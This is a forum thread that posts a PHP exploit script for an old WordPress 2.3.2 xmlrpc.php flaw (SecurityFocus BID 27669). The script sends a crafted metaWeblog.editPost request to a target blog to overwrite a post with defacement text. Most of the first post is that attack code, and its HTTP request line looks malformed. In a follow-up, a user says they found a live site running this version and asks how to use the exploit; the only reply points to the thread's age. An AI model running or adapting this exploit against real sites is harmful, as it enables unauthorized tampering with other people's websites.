WordPress 2.3.2

  • WordPress 2.3.2

    WordPress 'xmlrpc.php' Post Edit Unauthorized Access Vulnerability
    Remote: Yes
    Published: Feb 07 2008 12:00AM

    bid : http://www.securityfocus.com/bid/27669/

    PHP code:
    <?php

    $host = ''; // blog url

    $page = '/xmlrpc.php';

    $data = '<?xml version="1.0" ?>
             <methodcall>
                     <methodname>metaWeblog.editPost</methodname>
                     <params>
                             <value>
                                     <i4>post_ID</i4>
                             </value>
                             <value>
                                     <string>username</string>
                             </value>
                             <value>
                                     <string>password</string>
                             </value>
                             <struct>
                                     <member>
                                             <name>post_type</name>
                                             <value>page</value>
                                     </member>
                                     <member>
                                             <name>title</name>
                                             <value>
                                                     <string>Pwnd</string>
                                             </value>
                                     </member>
                                     <member>
                                             <name>de******ion</name>
                                             <value>Whoo is ma biatch</value>
                                     </member>
                             </struct>
                     </params>
             </methodcall>';

    $exploited = fsockopen($host, 80, $errorNumber, $errorString);

    $requestHeader = " ".$page."  HTTP/1.1\r\n";
     
    $requestHeader.= "Host: ".$host."\r\n";
     
    $requestHeader.= "User-Agent:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
     
    $requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";
     
    $requestHeader.= "Content-Length: ".strlen($data)."\r\n";
     
    $requestHeader.= "Connection: close\r\n\r\n";
     
    $requestHeader.= $data;
     
    fwrite($exploited, $requestHeader);

    echo 'done';
     
    ?>
    Better to die standing than to live on your knees.

  • #2
    I found a site that uses this WordPress. How does this work?


    • #3
      It wouldn't hurt to take a look at the date of the topic.
      ! Security is never Complete
